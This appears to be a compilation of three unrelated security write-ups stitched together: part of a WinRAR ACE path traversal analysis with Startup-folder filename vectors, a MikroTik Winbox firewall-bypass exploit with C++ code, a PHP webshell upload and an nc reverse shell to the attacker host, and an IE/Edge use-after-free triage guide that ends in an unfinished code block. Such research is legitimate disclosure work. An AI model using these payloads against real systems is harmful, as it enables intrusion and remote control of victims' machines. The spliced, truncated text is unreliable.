The relative path is checked by the WinRAR callback’s validator. The validator returns ACE_CALLBACK_RETURN_CANCEL to the dll (because the filename field starts with a backslash “\”) and the file creation is aborted.

The following string is passed to the WinRAR callback’s validator:

“\sourbe\RED VERSION_¶”

Note: The original filename field is “\sourbe\RED VERSION*¶”; unacev2.dll replaces the “*” with an underscore.

Why were the folders that were specified in the exploit file created, while the extracted file was not?

Because of a bug in the dll (unacev2.dll), even if ACE_CALLBACK_RETURN_CANCEL is returned from the callback, the folders specified in the relative path (filename field in the ACE archive) are created by the dll.

The reason for this is that unacev2.dll calls the external validator (callback) before the folder creation, but it checks the return value from the callback too late, after the creation of the folder. Therefore, it aborts the extraction operation just before writing content to the extracted file, before the call to the WriteFile API.

It actually creates the extracted file, without writing content to it. It calls the CreateFile API and then checks the return code from the callback function. If the return code is ACE_CALLBACK_RETURN_CANCEL, it deletes the file that was previously created by the call to CreateFile.

Side Notes:

  • We found a way to bypass the deletion of the file, but it allows us to create empty files only. We can bypass the file deletion by adding “:” to the end of the file name, which is then treated as an Alternate Data Stream. If the callback returns ACE_CALLBACK_RETURN_CANCEL, the dll tries to delete the Alternate Data Stream of the file instead of the file itself.
  • There is another filter function in the dll code that aborts the extraction operation if the relative path string starts with “\” (backslash). This happens in the first extraction stages, before the calls to any other filter function.
    However, by adding “*” or “?” characters (wildcard characters) to the relative path (filename field) of the compressed file, this check is skipped and the code flow can continue and (partially) trigger the Path Traversal vulnerability. This is why the exploit file which was produced by the fuzzer triggered the bug in our harness. It doesn’t trigger the bug in WinRAR because of the callback validator in the WinRAR code.

Summary of Intermediate Findings

  • We found a Path Traversal vulnerability in unacev2.dll. It enables our harness to extract the file to an arbitrary path, completely ignoring the destination folder and treating the relative path of the extracted file as the full path.
  • Two constraints lead to the Path Traversal vulnerability (summarized in previous sections):
    1. The first char should be a ‘/’ or a ‘\’.
    2. ‘*’ should be included in the filename at least once. The location does not matter.
  • WinRAR is partially vulnerable to the Path Traversal:
    • unacev2.dll doesn’t abort the operation after getting the abort code from the WinRAR callback (ACE_CALLBACK_RETURN_CANCEL). Due to this delayed check of the return code from WinRAR callback, the directories specified in the exploit file are created.
    • The extracted file is created as well, on the full path specified in the exploit file (without content), but it is deleted right after checking the returned code from the callback (before the call to WriteFile API).
    • We found a way to bypass the deletion of the file, but it allows us to create empty files only.

Finding the Root Cause

At this point, we wanted to figure out why the destination folder is ignored, and the relative path of the archive files (filename field) is treated as the full path.

To achieve this goal, we could use static analysis and debugging, but we decided on a much quicker method. We used DynamoRio to record the code coverage in unacev2.dll of a regular ACE file and of our exploit file which triggered the bug. We then used the lighthouse plugin for IDA and subtracted one coverage path from the other.

These are the results we got:

Figure 14: Lighthouse’s coverage overview window. You can see the coverage subtraction in the “Composer” form, and one result highlighted in purple.

In the “Coverage Overview” window we can see a single result. This means there is only one basic block that was executed in the first attempt (marked in A) and wasn’t reached on the second attempt (marked in B).

The Lighthouse plugin marked the background of the diffed basic block in blue, as you can see in the image below.

Figure 15: IDA graph view of the main bug in unacev2.dll. Lighthouse marked the background of the diffed basic block in blue.

From the code coverage results, you can understand that the exploit file is not going through the diffed basic block (marked in blue), but it takes the opposite basic block (the false condition, marked with a red arrow).

If the code flow goes through the false condition (red arrow), the line inside the green frame replaces the destination folder with "" (empty string) in the later call to sprintf, which concatenates the destination folder with the relative path of the extracted file.

The code flow to the true and false conditions, marked with green and red arrows respectively, is influenced by the call to the function named GetDevicePathLen (inside the red frame).

If the result from the call to GetDevicePathLen equals 0, the sprintf looks like this:

sprintf(final_file_path, "%s%s", destination_folder, file_relative_path);

Otherwise:

sprintf(final_file_path, "%s%s", "", file_relative_path);

The last sprintf is the buggy code that triggers the Path Traversal vulnerability.

This means that the relative path will actually be treated as the full path to the file/directory that should be written/created.

Let’s look at GetDevicePathLen function to get a better understanding of the root cause:

Figure 16: GetDevicePathLen code.

The relative path of the extracted file is passed to GetDevicePathLen. It checks whether a device or drive name prefix appears in the Path parameter and returns the length of that prefix, like this:

  • The function returns 3 for this path: C:\some_folder\some_file.ext
  • The function returns 1 for this path: \some_folder\some_file.ext
  • The function returns 15 for this path: \\LOCALHOST\C$\some_folder\some_file.ext
  • The function returns 21 for this path: \\?\Harddisk0Volume1\some_folder\some_file.ext
  • The function returns 0 for this path: some_folder\some_file.ext

If the return value from GetDevicePathLen is greater than 0, the relative path of the extracted file will be considered as the full path, because the destination folder is replaced by  an empty string during the call to sprintf, and this leads to Path Traversal vulnerability.
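The behavior described above can be approximated in Python. This is a minimal sketch reconstructed only from the return values listed in the text, not a port of the code in Figure 16. The names `get_device_path_len` and `build_final_path`, and the handling of a malformed UNC prefix (returning 0), are assumptions.

```python
def get_device_path_len(path: str) -> int:
    """Approximate length of the drive/device prefix; 0 if there is none."""
    if len(path) >= 2 and path[1] == ":":
        # Drive prefix "X:", plus one if a backslash follows it.
        return 3 if path[2:3] == "\\" else 2
    if path.startswith("\\\\"):
        # UNC-style prefix: count everything up to and including the
        # backslash that ends the second component ("\\server\share\").
        end_of_first = path.find("\\", 2)
        if end_of_first == -1:
            return 0  # assumption: malformed prefix treated as "no device"
        end_of_second = path.find("\\", end_of_first + 1)
        if end_of_second == -1:
            return 0  # assumption, as above
        return end_of_second + 1
    if path.startswith("\\"):
        # A single leading backslash refers to the current drive.
        return 1
    return 0


def build_final_path(destination_folder: str, file_relative_path: str) -> str:
    """Mirror the two sprintf calls: drop the destination if a prefix exists."""
    if get_device_path_len(file_relative_path) == 0:
        return destination_folder + file_relative_path
    return "" + file_relative_path  # the buggy branch


if __name__ == "__main__":
    # "C:\Extract\" is a hypothetical destination folder.
    print(build_final_path("C:\\Extract\\", "some_folder\\some_file.ext"))
    print(build_final_path("C:\\Extract\\", "C:\\some_folder\\some_file.ext"))
```

The second call shows the core of the bug: once the prefix length is non-zero, the destination folder no longer influences the final path.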

However, there is a function that “cleans” the relative path of the extracted file by omitting any sequences that are not allowed, before the call to GetDevicePathLen.

This is the pseudo-code of the function that cleans the path, “CleanPath”.

Figure 17: Pseudo-code of CleanPath.

The function omits trivial Path Traversal sequences like “\..\” (it only omits the “..\” sequence if it is found at the beginning of the path), and it omits drive sequences like “C:\” and “C:”, and, for an unknown reason, “C:\C:” as well.

Note that it doesn’t care about the first letter; the following sequences will be omitted as well: “_:\”, “_:”, “_:\_:” (in this case the underscore represents any value).

Putting It All Together

Our goal is to create an exploit file that causes WinRAR to extract an archived file to an arbitrary path (Path Traversal), for example to the Startup folder (which gains code execution after reboot), instead of to the destination folder.

We should bypass two filter functions to trigger the bug.

To trigger the concatenation of an empty string to the relative path of the compressed file, instead of the destination folder:

sprintf(final_file_path, "%s%s", "", file_relative_path);

Instead of:

sprintf(final_file_path, "%s%s", destination_folder, file_relative_path);

The result from the GetDevicePathLen function should be greater than 0. It depends on the content of the relative path (“file_relative_path”). If the relative path starts with a device path in one of these ways:

  • option 1: C:\some_folder\some_file.ext
  • option 2: \some_folder\some_file.ext (The first backslash represents the current drive.)

The return value from GetDevicePathLen will be greater than 0. However, there is a filter function in unacev2.dll named CleanPath (Figure 17) that checks if the relative path starts with C:\ and removes it from the relative path string before the call to GetDevicePathLen.

It omits the “C:\” sequence from the option 1 string but doesn’t omit the “\” sequence from the option 2 string.

To overcome this limitation, we can add another “C:\” sequence to option 1. CleanPath (Figure 17) omits it and leaves the relative path we wanted, with one “C:\”, like:

  • option 1’: C:\C:\some_folder\some_file.ext  =>  C:\some_folder\some_file.ext

However, there is a callback function in the WinRAR code (Figure 13) that is used as a validator/filter function. During the extraction process, unacev2.dll calls the callback function that resides in the WinRAR code.

The callback function validates the relative path of the compressed file. If a blacklisted sequence is found, the extraction operation is aborted.

One of the checks made by the callback function is whether the relative path starts with “\” (backslash) or “/” (slash). But it doesn’t check for “C:\”. Therefore, we can use option 1’ to exploit the Path Traversal vulnerability!

We also found an SMB attack vector, which makes it possible to connect to an arbitrary IP address and create files and folders in arbitrary paths on the SMB server.

Example:
C:\\\10.10.10.10\smb_folder_name\some_folder\some_file.ext => \\10.10.10.10\smb_folder_name\some_folder\some_file.ext

Example of a Simple Exploit File

We change the .ace extension to .rar; this works because WinRAR detects the format by the content of the file and not by the extension.

This is the output from acefile:

Figure 18: Header output by acefile.py of the simple exploit file.

We trigger the vulnerability by the crafted string of the filename field (in green).

This archive will be extracted to C:\some_folder\some_file.txt no matter what the path of the destination folder is.

Creating a Real Exploit

We can gain code execution by extracting a compressed executable file from the ACE archive to one of the Startup folders. Any files that reside in the Startup folders will be executed at boot time.
Crafting an ACE archive that extracts its compressed files to the Startup folder seems trivial, but it’s not.
There are at least 2 Startup folders, at the following paths:

  1. C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
  2. C:\Users\<user name>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

The first Startup folder path requires high privileges / a high integrity level (in case UAC is on). However, WinRAR runs by default with a medium integrity level.

The second Startup folder path requires knowing the name of the user.

We can try to overcome this by creating an ACE archive with thousands of crafted compressed files, each of which contains the path to the Startup folder with a different <user name>, and hope that one of them works on our target.

The Most Powerful Vector

We have found a vector which allows us to extract a file to the Startup folder without caring about the <user name>.

By using the following filename field in the ACE archive:

C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe

It is translated to the following path by the CleanPath function (Figure 17):

C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe

This is because the CleanPath function removes the “C:\C:” sequence.

Moreover, the destination folder will be ignored because the GetDevicePathLen function (Figure 16) will return 2 for the last “C:” sequence.

Let’s analyze the last path:

The sequence “C:” is translated by Windows to the “current directory” of the running process. In our case, it’s the current path of WinRAR.

If WinRAR is executed from its folder, the “current directory” will be this WinRAR folder: C:\Program Files\WinRAR

However, if WinRAR is executed by double clicking on an archive file or by right clicking on “extract” in the archive file, the “current directory” of WinRAR will be the path to the folder that the archive resides in.

Figure 19: WinRAR’s extract options (WinRAR’s shell extension added to the right-click menu)

For example, if the archive resides in the user’s Downloads folder, the “current directory” of WinRAR will be:
  C:\Users\<user name>\Downloads
If the archive resides in the Desktop folder, the “current directory” path will be:
  C:\Users\<user name>\Desktop

To get from the Desktop or Downloads folder to the Startup folder, we should go back one folder (“../”) to the “user folder”, and concatenate the relative path to the Startup directory, AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\, to the following sequence: “C:../”

This is the end result:  C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe
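To make the resolution step concrete, the sketch below uses Python's `ntpath` module (pure string handling, so it runs on any platform) to approximate how a drive-relative path such as “C:../…” resolves against a process's current directory. The helper name `resolve_drive_relative` and the user name `bob` are hypothetical, and the sketch assumes the drive letter in the path matches the drive of the current directory.

```python
import ntpath


def resolve_drive_relative(current_directory: str, path: str) -> str:
    """Resolve a drive-relative path (e.g. 'C:../x') against a current directory.

    Assumption: the drive in `path` is the same as the drive of
    `current_directory`, as in the scenario described in the text.
    """
    _drive, rest = ntpath.splitdrive(path)  # 'C:', '../AppData\\...'
    joined = current_directory.rstrip("\\") + "\\" + rest
    # normpath converts '/' to '\' and collapses the '..' component.
    return ntpath.normpath(joined)


if __name__ == "__main__":
    target = (
        "C:../AppData\\Roaming\\Microsoft\\Windows\\"
        "Start Menu\\Programs\\Startup\\some_file.exe"
    )
    # Archive opened from a (hypothetical) user's Downloads folder.
    print(resolve_drive_relative("C:\\Users\\bob\\Downloads", target))
    # WinRAR started from its own folder: the path does not reach Startup.
    print(resolve_drive_relative("C:\\Program Files\\WinRAR", target))
```

The second call illustrates why the vector depends on where WinRAR's current directory points: from the WinRAR installation folder the same filename resolves under C:\Program Files instead of the user's profile.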

Remember that there are 2 checks against path traversal sequences:

  • In the CleanPath function which skips such sequences.
  • In WinRAR’s callback function which aborts the extraction operation.

CleanPath checks for the following path traversal pattern: “\..\”

The WinRAR’s callback function checks for the following patterns:

  1. “\..\”
  2. “\../”
  3. “/../”
  4. “/..\”

Because our sequence “C:../” is not preceded by a slash or backslash, we can bypass the path traversal validation. However, we can only go back one folder. That is all we need to extract a file to the Startup folder without knowing the user name.

Note: If we want to go back more than one folder, we have to append another “../”, for example “C:../../”. That path contains the “/../” sequence, which will be caught by the callback validator function, and the extraction will be aborted.

Demonstration (POC)

Side Note

Toward the end of our research, we discovered that WinACE created an extraction utility like unacev2.dll for Linux, called unace-nonfree (compiled using the Watcom compiler). The source code is available.
The source code for Windows (which unacev2.dll was built from) is included as well, but it’s older than the last version of unacev2.dll, and can’t be compiled/built for Windows. In addition, some functionality is missing in the source code. For example, the checks in Figure 17 are not included.

However, Figure 16 was taken from the source code.
We also found the Path Traversal bug in the source code. It looks like this:

Figure 20:  The path traversal bug in the source code of unace-nonfree


CVEs:

CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, CVE-2018-20253.

WinRAR’s Response

WinRAR decided to drop UNACEV2.dll from their package, and WinRAR no longer supports the ACE format as of version “5.70 beta 1”.

Quote from WinRAR website:

“Nadav Grossman from Check Point Software Technologies informed us about a security vulnerability in UNACEV2.DLL library.
Aforementioned vulnerability makes possible to create files in arbitrary folders inside or outside of destination folder 
when unpacking ACE archives. 
WinRAR used this third party library to unpack ACE archives.
UNACEV2.DLL had not been updated since 2005 and we do not have access to its source code.
So we decided to drop ACE archive format support to protect security of WinRAR users.

We are thankful to Check Point Software Technologies for reporting this issue.”

Check Point’s SandBlast Agent Behavioral Guard protects against these threats.

Check Point’s IPS blade provides protections against this threat: “RARLAB WinRAR ACE Format Input Validation Remote Code Execution (CVE-2018-20250)”

MikroTik Firewall & NAT Bypass Exploitation from WAN to LAN

Original text by Jacob Baines

A Design Flaw

In Making It Rain with MikroTik, I mentioned an undisclosed vulnerability in RouterOS. The vulnerability, which I assigned CVE-2019-3924, allows a remote, unauthenticated attacker to proxy crafted TCP and UDP requests through the router’s Winbox port. Proxied requests can even bypass the router’s firewall to reach LAN hosts.

Mistakes were made

The proxying behavior is neat, but, to me, the most interesting aspect is that attackers on the WAN can deliver exploits to (nominally) firewall protected hosts on the LAN. This blog will walk through that attack. If you want to skip right to the, sort of complicated, proof of concept video then here it is:

The Setup

To demonstrate this vulnerability, I need a victim. I don’t have to look far because I have a NUUO NVRMini2 sitting on my desk due to some previous vulnerability work. This NVR is a classic example of a device that should be hidden behind a firewall and probably segmented away from everything else on your network.

Join an IoT Botnet in one easy step!

In my test setup, I’ve done just that. The NVRMini2 sits behind a MikroTik hAP router with both NAT and firewall enabled.

NVRMini2 should be safe from the attacker at 192.168.1.7

One important thing about this setup is that I opened port 8291 in the router’s firewall to allow Winbox access from the WAN. By default, Winbox is only available on the MikroTik hAP via the LAN. Don’t worry, I’m just simulating real world configurations.

The attacker, 192.168.1.7, shouldn’t be able to initiate communication with the victim at 10.0.0.252. The firewall should prevent that. Let’s see how the attacker can get at 10.0.0.252 anyways.

Probing to Bypass the Firewall

CVE-2019-3924 is the result of the router not enforcing authentication on network discovery probes. Under normal circumstances, The Dude authenticates with the router and uploads the probes over the Winbox port. However, one of the binaries that handles the probes (agent) fails to verify whether the remote user is authenticated.

Probes are a fairly simple concept. A probe is a set of variables that tells the router how to talk to a host on a given port. The probe supports up to three requests and responses. Responses are matched against a provided regular expression. The following is the builtin HTTP probe.

The HTTP probe sends a HEAD request to port 80 and checks if the response starts with “HTTP/1.”

In order to bypass the firewall and talk to the NVRMini2 from 192.168.1.7, the attacker just needs to provide the router with a probe that connects to 10.0.0.252:80. The obvious question is, “How do you determine if a LAN host is an NVRMini2?”

The NVRMini2 and the various OEM variations all have very similar landing page titles.

Using the title tag, you can construct a probe that detects an NVRMini2. The following is taken from my proof of concept on GitHub. I’ve again used my WinboxMessage implementation.

bool find_nvrmini2(Winbox_Session& session,
                   std::string& p_address,
                   boost::uint32_t p_converted_address,
                   boost::uint32_t p_converted_port)
{
    WinboxMessage msg;
    msg.set_to(104);
    msg.set_command(1);
    msg.set_request_id(1);
    msg.set_reply_expected(true);
    // Probe request: an HTTP GET sent to the target.
    msg.add_string(7, "GET / HTTP/1.1\r\nHost:" + p_address +
                      "\r\nAccept:*/*\r\n\r\n");
    // Expression the response is matched against.
    msg.add_string(8, "Network Video Recorder Login</title>");
    msg.add_u32(3, p_converted_address); // ip address
    msg.add_u32(4, p_converted_port); // port

    session.send(msg);
    msg.reset();

    if (!session.receive(msg))
    {
        std::cerr << "Error receiving a response." << std::endl;
        return false;
    }

    if (msg.has_error())
    {
        std::cerr << msg.get_error_string() << std::endl;
        return false;
    }

    return msg.get_boolean(0xd);
}

You can see I constructed a probe that sends an HTTP GET request and looks for “Network Video Recorder Login</title>” in the response. The router, 192.168.1.70, will take in this probe and send it to the host I’ve defined in msg.add_u32(3) and msg.add_u32(4). In this case, that would be 10.0.0.252 and 80 respectively. This logic bypasses the normal firewall rules.

The following screenshot shows the attacker (192.168.1.7) using the probe against 10.0.0.254 (Ubuntu 18.04) and 10.0.0.252 (NVRMini2). You can see that the attacker can’t even ping these devices. However, by using the router’s Winbox interface the attacker is able to reach the LAN hosts.

Discovery of the NVRMini2 on the supposedly unreachable LAN is neat, but I want to go a step further. I want to gain full access to this network. Let’s find a way to exploit the NVRMini2.

Crafting an Exploit

The biggest issue with probes is the size limit. The requests and response regular expressions can’t exceed a combined 220 bytes. That means any exploit will have to be concise. My NVRMini2 stack buffer overflow is anything but concise. It takes 170 bytes just to overflow the cookie buffer. Not leaving room for much else. But CVE-2018-11523 looks promising.

The code CVE-2018-11523 exploits. Yup.

CVE-2018-11523 is an unauthenticated file upload vulnerability. An attacker can use it to upload a PHP webshell. The proof of concept on exploit-db is 461 characters. Way too big. However, with a little ingenuity it can be reduced to 212 characters.

POST /upload.php HTTP/1.1
Host:a
Content-Type:multipart/form-data;boundary=a
Content-Length:96

--a
Content-Disposition:form-data;name=userfile;filename=a.php

<?php system($_GET['a']);?>
--a

This exploit creates a minimalist PHP webshell at a.php. Translating it into a probe request is fairly trivial.

bool upload_webshell(Winbox_Session& session,
                     boost::uint32_t p_converted_address,
                     boost::uint32_t p_converted_port)
{
    WinboxMessage msg;
    msg.set_to(104);
    msg.set_command(1);
    msg.set_request_id(1);
    msg.set_reply_expected(true);
    // Probe request: the minimized multipart upload.
    msg.add_string(7, "POST /upload.php HTTP/1.1\r\nHost:a\r\nContent-Type:multipart/form-data;boundary=a\r\nContent-Length:96\r\n\r\n--a\nContent-Disposition:form-data;name=userfile;filename=a.php\n\n<?php system($_GET['a']);?>\n--a\n");
    // Expression the response is matched against.
    msg.add_string(8, "200 OK");

    msg.add_u32(3, p_converted_address); // ip address
    msg.add_u32(4, p_converted_port); // port

    session.send(msg);
    msg.reset();

    if (!session.receive(msg))
    {
        std::cerr << "Error receiving a response." << std::endl;
        return false;
    }

    if (msg.has_error())
    {
        std::cerr << msg.get_error_string() << std::endl;
        return false;
    }

    return msg.get_boolean(0xd);
}

Sending the above probe request through the router to 10.0.0.252:80 should create a basic PHP webshell.
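As a quick sanity check on the size constraint, the following Python sketch rebuilds the same request string, derives the Content-Length from the body, and compares the combined size of the request and response expression against the 220-byte limit quoted earlier. The helper name `fits_probe` is hypothetical, and treating the limit as a simple sum of the two string lengths is an assumption about how the router counts.

```python
PROBE_LIMIT = 220  # combined limit for request and response expression (from the text)

# Multipart body, byte-for-byte the same as in the C++ string above.
body = (
    "--a\n"
    "Content-Disposition:form-data;name=userfile;filename=a.php\n\n"
    "<?php system($_GET['a']);?>\n"
    "--a\n"
)

# Headers are kept as short as possible; Content-Length is computed, not typed.
request = (
    "POST /upload.php HTTP/1.1\r\n"
    "Host:a\r\n"
    "Content-Type:multipart/form-data;boundary=a\r\n"
    f"Content-Length:{len(body)}\r\n"
    "\r\n"
) + body

response_regex = "200 OK"


def fits_probe(request_text: str, regex: str, limit: int = PROBE_LIMIT) -> bool:
    """Assumed size rule: request plus expression must not exceed the limit."""
    return len(request_text) + len(regex) <= limit


if __name__ == "__main__":
    print("body length:", len(body))
    print("fits in a probe:", fits_probe(request, response_regex))
```

Computing the header from the body avoids a mismatched Content-Length when the payload is edited.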

Crafting a Reverse Shell

At this point you could start blindly executing commands on the NVR using the webshell. But being unable to see responses and constantly having to worry about the probe’s size restriction is annoying. Establishing a reverse shell back to the attacker’s box on 192.168.1.7 is a far more ideal solution.

Now, it seems to me that there is little reason for an embedded system to have nc with the -e option. Reason rarely seems to have a role in these types of things though. The NVRMini2 is no exception. Of course, nc -e is available.

bool execute_reverse_shell(Winbox_Session& session,
                           boost::uint32_t p_converted_address,
                           boost::uint32_t p_converted_port,
                           std::string& p_reverse_ip,
                           std::string& p_reverse_port)
{
    WinboxMessage msg;
    msg.set_to(104);
    msg.set_command(1);
    msg.set_request_id(1);
    msg.set_reply_expected(true);
    // Probe request: run a URL-encoded nc command through the webshell.
    msg.add_string(7, "GET /a.php?a=(nc%20" + p_reverse_ip + "%20" + p_reverse_port + "%20-e%20/bin/bash)%26 HTTP/1.1\r\nHost:a\r\n\r\n");
    // Expression the response is matched against.
    msg.add_string(8, "200 OK");

    msg.add_u32(3, p_converted_address); // ip address
    msg.add_u32(4, p_converted_port); // port

    session.send(msg);
    msg.reset();

    if (!session.receive(msg))
    {
        std::cerr << "Error receiving a response." << std::endl;
        return false;
    }

    if (msg.has_error())
    {
        std::cerr << msg.get_error_string() << std::endl;
        return false;
    }

    return msg.get_boolean(0xd);
}

The probe above executes the command “nc 192.168.1.7 1270 -e /bin/bash” via the webshell at a.php. The nc command will connect back to the attacker’s box with a root shell.
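The request string in the probe is just the shell command percent-encoded into the webshell's query parameter. The Python sketch below reproduces that encoding with the standard library; the function name `build_reverse_shell_request` is hypothetical, and the set of characters left unencoded is chosen only to match the string used in the C++ code.

```python
from urllib.parse import quote, unquote


def build_reverse_shell_request(reverse_ip: str, reverse_port: str) -> str:
    """Build the GET request that runs nc through the a.php webshell."""
    # The command runs in a subshell and is backgrounded with '&'.
    command = f"(nc {reverse_ip} {reverse_port} -e /bin/bash)&"
    # Keep '(', ')' and '/' literal; spaces become %20 and '&' becomes %26.
    encoded = quote(command, safe="()/")
    return f"GET /a.php?a={encoded} HTTP/1.1\r\nHost:a\r\n\r\n"


if __name__ == "__main__":
    request = build_reverse_shell_request("192.168.1.7", "1270")
    print(request)
    # Decoding the query value recovers the original command.
    print(unquote(request.split("a=", 1)[1].split(" ", 1)[0]))
```

Encoding the trailing “&” as %26 matters: left literal, it would be parsed as a query-string separator instead of reaching the shell.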

Putting It All Together

I’ve combined the three sections above into a single exploit. The exploit connects to the router, sends a discovery probe to a LAN target, uploads a webshell, and executes a reverse shell back to a WAN host.

albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$ ./nvr_rev_shell --proxy_ip 192.168.1.70 --proxy_port 8291 --target_ip 10.0.0.252 --target_port 80 --listening_ip 192.168.1.7 --listening_port 1270
[!] Running in exploitation mode
[+] Attempting to connect to a MikroTik router at 192.168.1.70:8291
[+] Connected!
[+] Looking for a NUUO NVR at 10.0.0.252:80
[+] Found a NUUO NVR!
[+] Uploading a webshell
[+] Executing a reverse shell to 192.168.1.7:1270
[+] Done!
albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$

The listener gets the root shell as expected.

Conclusion

I found this bug while scrambling to write a blog to respond to a Zerodium tweet. I was not actively doing MikroTik research. Honestly, I’m just trying to get ready for BSidesDublin. What are the people actually doing MikroTik research finding? Are they turning their bugs over to MikroTik (for nothing) or are they selling those bugs to Zerodium?

Do I have to spell it out for you?

Don’t expose Winbox to the internet.

Triaging the exploitability of IE/EDGE crashes

Original text by swiat

Introduction

Both Internet Explorer (IE) and Edge have seen significant changes in order to help protect customers from security threats. This work has featured a number of mitigations that together have not only rendered classes of vulnerabilities not-exploitable, but also dramatically raised the cost for attackers to develop a working exploit.

Because of these changes, determining the exploitability of crashes has become increasingly complicated, as the effect of these mitigations must be taken into account during analysis. We have received a number of requests from the security community for clarification on how these mitigations affect exploitability.  To ensure that only valid issues are submitted, we thought it may be useful to offer some guidance.

 

Use after free mitigations

Use-after-free (UAF) is a common type of vulnerability in modern object-orientated software. They are caused when an instance of an object is freed while a pointer to the object is still kept by the program. Since the object instance has been freed, this pointer is dangling, pointing to unmapped memory. Such a vulnerability is exploitable when the unmapped memory is controllable by an attacker, and will be used when the dangling pointer is later dereferenced by the program. We can split UAF vulnerabilities into 3 classes based upon where the dangling pointer is stored: the stack, heap, and the registers.

We have developed two primary mitigations to protect against UAFs:

  • Memory Protector (MP) [IE10 and below]

MP is designed to protect objects against UAFs where the reference is stored on the stack, or in a register.

  • MemGC [Edge & IE11]

MemGC is a new replacement for MP, currently enabled on Edge and IE11. Protected objects are only freed when no references exist on the stack, heap or registers, offering complete coverage. 

 

Exploitability & Servicing

MemGC [Edge & IE11]

  • We consider UAFs that are addressed by MemGC strongly mitigated, and will not issue a security update for them.
  • The only exception for this are rare cases where zero writing the object leads to an exploitable state, although we have yet to see an occurrence of this.

Memory Protector [IE10 and below]

  • We consider stack and register based UAFs strongly mitigated and will not issue a security update for them, except in the circumstances explained below.
  • Heap reference based UAFs are not mitigated by MP, and so will still be addressed via a security update.

 

Triaging crashes

Memory protector

Memory protector (MP) is a mitigation first introduced in July 2014 initially for all supported versions of Internet Explorer, but now only applies to IE 10 and below. It is designed to mitigate a subset of use-after-free vulnerabilities, due to dangling pointers stored on the stack or the registers. At a high level, it works as follows:

  1. When delete is called on an object instance, its contents are zeroed, and it is placed in a queue. Once the queue has reached a threshold size, we begin checking whether it is safe to free each object instance in the queue.
  2. To test to see if it is safe to free an object instance, we scan both the registers and all pointer aligned stack entries to see if there exists a pointer to the object. If no pointer is found then the object is freed, otherwise the object is kept in the queue.

Part (1) of the algorithm only delays the potential freeing of the object to a later point in time. This delay is controllable by an attacker, and as such it is not considered a security mitigation.

To make it easier to determine the exploitability of these issues, MP has a mode called “Stress Mode”. Under this mode the delayed free component (1) of MP is disabled: stack/register scanning happens on every free, rather than when the queue has reached a threshold length. It can be enabled with the registry key:

HKLM:/Software/Microsoft/Internet Explorer/Main/Feature Control/FEATURE_MEMPROTECT_MODE/iexplore.exe DWORD 2

(note that this key, and “Stress Mode” are only applicable to MP, not MemGC).
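The two-step algorithm and the effect of Stress Mode can be illustrated with a toy model in Python. This is only a sketch of the behavior described above, not the real implementation: the class name, the queue threshold of 3, and the representation of the stack and registers as a plain list of integer values are all assumptions.

```python
class MemoryProtectorModel:
    """Toy model of delayed free plus stack/register scanning."""

    def __init__(self, threshold: int = 3, stress_mode: bool = False):
        self.threshold = threshold      # hypothetical queue threshold
        self.stress_mode = stress_mode  # scan on every delete when True
        self.queue = []                 # zeroed objects waiting to be freed
        self.freed = []                 # base addresses actually released

    def delete(self, obj: dict, roots: list) -> None:
        """obj has 'addr' and 'data'; roots are stack/register values."""
        # Step 1: zero the contents and queue the object.
        obj["data"] = bytes(len(obj["data"]))
        self.queue.append(obj)
        if self.stress_mode or len(self.queue) >= self.threshold:
            self.reclaim(roots)

    def reclaim(self, roots: list) -> None:
        """Step 2: free only objects that no root value points into."""
        still_referenced = []
        for obj in self.queue:
            start, end = obj["addr"], obj["addr"] + len(obj["data"])
            if any(start <= value < end for value in roots):
                still_referenced.append(obj)
            else:
                self.freed.append(obj["addr"])
        self.queue = still_referenced


if __name__ == "__main__":
    mp = MemoryProtectorModel(stress_mode=True)
    victim = {"addr": 0x1000, "data": b"\x41" * 0x30}
    mp.delete(victim, roots=[0x1010])  # a stack slot still points into it
    print("freed:", mp.freed, "queued:", len(mp.queue))
```

With `stress_mode=True` the queue threshold no longer hides the outcome of the scan, which is the point of enabling the mode during triage.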

Example crash

With the delayed free component of MP now disabled by forcing the object instance to be freed at the earliest possible instant, we can now concentrate on determining exploitability, based on Part (2), as shown by an illustrative example below:

In this case, we have a use-after-free vulnerability causing a near-null dereference. Tracing backwards, we can see that the value of eax was set a few instructions previously:

If we look at this object in memory, we see that it has been zeroed, and by checking the PageHeap End Magic we can see that this heap chunk is still allocated under Stress Mode:

Now we need to see if there are any stack references to this object instance, starting at the call frame when delete was called. This can be completed using windbg scripting: for example, scanning for references to an object with base address stored in ebx with size 0x30:

Checking stack reference locations with MP

In this case, we find a single reference to the object instance on the stack. With this information we must now check to see which call frame contains this reference.

Here, we show an example call stack at the point when the object is deleted:

If there is a reference to an object instance on the stack or registers, then MP will never free the object instance. Thus, if between the point delete is first called in frame_2 until the point when we crash with a near null dereference in frame_5 there is always a stack reference, the object instance cannot be freed and reallocated/controlled by an attacker.

In this example, the reference we found by scanning the stack (at 0x1024ae9c) is stored in frame_8. Since this reference is present all of the time between the freeing point in frame_2 and the crashing point in frame_5, we consider this case as not-exploitable since it is strongly mitigated by MP.

Two other main situations can also occur:

  1. If (for example) the stack reference was in frame_3 rather than frame_8, then there is a period between the freeing of the object and the crashing point when there are no stack references. This case may be exploitable since if the code path between these points can be slightly altered to force another call to delete, we will be left with an exploitable situation.
  2. When running under stress mode, the crash may now occur on a freed block since the delayed free component is disabled (usually due to the reference being stored on the heap). Under this circumstance, the case would be generally exploitable.
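The frame-based reasoning can be condensed into a small Python helper. It is a simplification under stated assumptions: frames are numbered as in a debugger call stack (0 is the innermost frame, higher numbers are older callers), the crash happens in frame_5 as stated where the call stack is introduced, and every frame below the crashing frame has already returned by the time of the crash. The function name `triage_stack_uaf` is hypothetical.

```python
def triage_stack_uaf(crash_frame: int, reference_frames: list) -> str:
    """Classify a stack/register UAF from where the references live.

    A reference stored in the crashing frame or in an older caller stays on
    the stack for the whole window between the delete and the crash, so the
    object cannot be freed in between. A reference in a younger frame is
    gone once that frame returns, which leaves a gap.
    """
    if any(frame >= crash_frame for frame in reference_frames):
        return "strongly mitigated"
    return "potentially exploitable"


if __name__ == "__main__":
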